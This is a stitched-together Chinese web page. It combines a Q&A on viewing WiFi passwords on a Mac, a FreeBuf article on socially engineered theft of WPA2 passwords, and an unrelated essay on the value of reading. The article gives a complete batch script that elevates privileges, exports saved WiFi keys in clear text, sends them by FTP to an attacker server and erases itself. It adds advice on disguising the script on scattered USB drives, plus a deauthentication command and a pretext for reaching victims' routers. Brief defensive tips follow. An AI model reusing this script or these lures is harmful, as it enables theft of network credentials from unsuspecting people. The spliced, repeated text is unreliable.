1.wpa2密码是什么?在路由器设置里面可以看到吗?
2.wifi没有问题,手机连上都可以正常上网,用mac连接别的wifi也是一样需要wpa2密码,可以在mac里通过设置取消上网需要输入wpa2密码吗?
请求高手回答
1、首先在mac电脑中,选中“本地项目”“密码”,可以看到正在连接的Wi-Fi帐号。
2、双击Wi-Fi帐号,在如图所示的“显示密码”前打勾。
3、这时候需要输入系统开机密码,如下图所示。
4、然后wifi密码便显示出来了,查看成功,如下图所示就完成了。
1、首先在mac电脑中,选中“本地项目”“密码”,可以看到正在连接的Wi-Fi帐号。
2、双击Wi-Fi帐号,在如图所示的“显示密码”前打勾。
3、这时候需要输入系统开机密码,如下图所示。
4、然后wifi密码便显示出来了,查看成功,如下图所示就完成了。
何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" exit /B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) md c:\win netsh wlan export profile key=clear folder=c:\win echo open 服务器ip>C:\config.txt echo user 账号>>C:\config.txt echo 密码>>C:\config.txt echo mput c:\win\*.xml>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo bye>>C:\config.txt ftp -n -s:"C:\config.txt" del C:\config.txt del C:\win\*.xml del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
wifi信息已经put上来了
就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用网络)对受害者使用断网攻击,等一小时后去敲门,询问网络是否故障,询问网络是哪家公司配置的,然后声称自己的网络也故障了,是一样的公司,然后询问报修电话并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复网络的假象,然后撤退。
2.结合移动存储攻击,配合badusb,谎称有重要文件需要发送然而手机没电了,家里人还没下班。第一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badusb,执行bat脚本或木马
3.谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码
0×03 wifi钓鱼
利用fluxion、wifiphisher等工具实施钓鱼攻击:
——项目地址
它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:
受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。
0×04 防御措施
1.绑定mac地址,设置白名单,只允许自己的机器连接wifi
2.隐藏wifi广播,避免自己成为目标
3.不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
4.尽量不让陌生人接触到自己的设备
5.wifi最好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
6.定期更换路由器管理界面密码和wifi密码
7.最好关闭路由器上的wps功能
8.尽量不使用wifi万能钥匙等类似软件
*本文作者:thr0cyte,转载请注明来自FreeBuf.COM
书,我没有读几本。说实话,我并非真正地喜欢阅读,只是阅读时的快感让我欲罢不能,我会上瘾,说白了,我感觉很爽。不仅如比,阅读给了我取之不尽、用之不竭的灵感,我相信很多人也是如此。我们的父母在我们小时候就告诉我们要读书,多读书,读好书。那么,读书到底有什么用?这是我们今天主要探讨的话题。
我觉得是这样,读一本书,读一百本中书,哪怕是你读完了天下的书,你要说读这些书有什么用,我还是回答不了你。因为读书,是每个人非常私人化的一件事。
你说读书能帮你提高语文成绩?或者读书能让你赚更大的钱,当更大的官?再或者读书让你变得善良?我觉得都不一定。同龄人当中,书读得比我多的人大有人在,可是,不见得他们考试的语文分数比我高啊。考试就是考试,考的是积累和技巧,很多时候,我是凭技巧取胜,有点投机取巧的心思。
你要说读书能帮你赚钱?中国首富前100位,读过的书加来,我估计还没有一个中文系教授读过的书多。但是首富前100位里中的任何一位,赚的钱肯定比一百个中文系教授还要多。
那你说读书能做官?我觉得这与读书的关系可能更小了。
你要说读书能让你善良?那历史上也多得是无恶不作的读书人,读了大半辈子书,全用在偷奸耍滑上,简直无人能敌。
那么问题来了——读书,到底有什么用?
我一直相信,人是有自己的精神力的,它是与生俱来的,它就是你的基因代码,决定着你的精神领城,你会如何思考,会度过怎样的一生。简单点说吧,就是你的品味。
读书,从根本上说,它是在改造你的底层代码。改变底层代码,也就改变了你的精神领域,改变了你的气质,改变了你的品位,那么也就改变了你的人生轨迹,大大提升了你的生活质量。
我听说过这样一个观点。人生中有两样东面,你是藏不住的。第一是咳嗽,你生病了,这掩盖不了。第二是穷,一个人穷困潦倒,所有人都能看得出来,这个事也遮盖不住,你怎么装,都没用。中国的未代皇帝溥仪,从小生活在皇宫里,天天看到的都是皇宫中祖传的真品文玩古董。他要读书,是前清状元来做老师,接受当时中国最好的传统教育。溥仪这个人,我不想做过多的评价,不论怎么说,他身上的贵族气质,那份儒雅和淡定,跟随着他一辈子。解放后,溥仪在北京清理各种文物,专家们争论不休,这个东西是真是假,溥仪扫了一眼后立马就说出哪个是真哪个是假。有些文物他说是假的,专家不承认啊,凭什么说是假的啊?溥仪的回答非常简单,这个东西和我小时候看到的东西不一样,你要非问个原因,我也讲不请楚,但我可以告诉你肯定不是那么回事,这个东西就是不对,不需要理由。因为我从小看到的,都是真的。这就是品味!
我说这个故事,其实就是想告诉大家什么叫品味,品味远远超越所谓的方法、能力。有品味了,你哪怕生活得再穷困,你是有品味的人,你的生活就不会单调枯燥,你照样可以有声有色有趣地生活。没有品味,就算你腰缠万贯,天天戴着大金链子、大金标表,你看起来也不过是土老帽儿,神色慌张,言谈无味,简单说,就是“绣花枕头一包草”。
说回来,咱们刚说了穷。物质上的“穷”你遮盖不住。没错,“穷”这件事,你自己是知道的,但是很可悲,没有品味这件事,你是不知道的。那些没有品位的人往往还觉得自己很有品位。比如我就见过穿着绿衣服红裤子跳广场舞的大妈,在接受媒体采访时觉得自己的舞蹈可以上剧场演出,还能带动老百姓热爱艺术,这样的事件其实并不少见。又比如某些大导演拍出非常艳俗的电影,票房不好,还说观众审美品味不够高。对于这些品位不高的“舞蹈演员”和“著名导演”,我的建议其实是一样的,那就是多读点书。
让每个人变成一个有品位的人,一个脱离低级趣味的人,有基本审美能力的的人,也许是让我们生活的这个世界变得更美好一些的一个方法。一个读过很多书的人,他的品味不会太差;一个品位不太差的人,不会做出太没品的事,可以在哪怕很简单朴素的生活中找到人性的尊严,赢得自己的尊重!
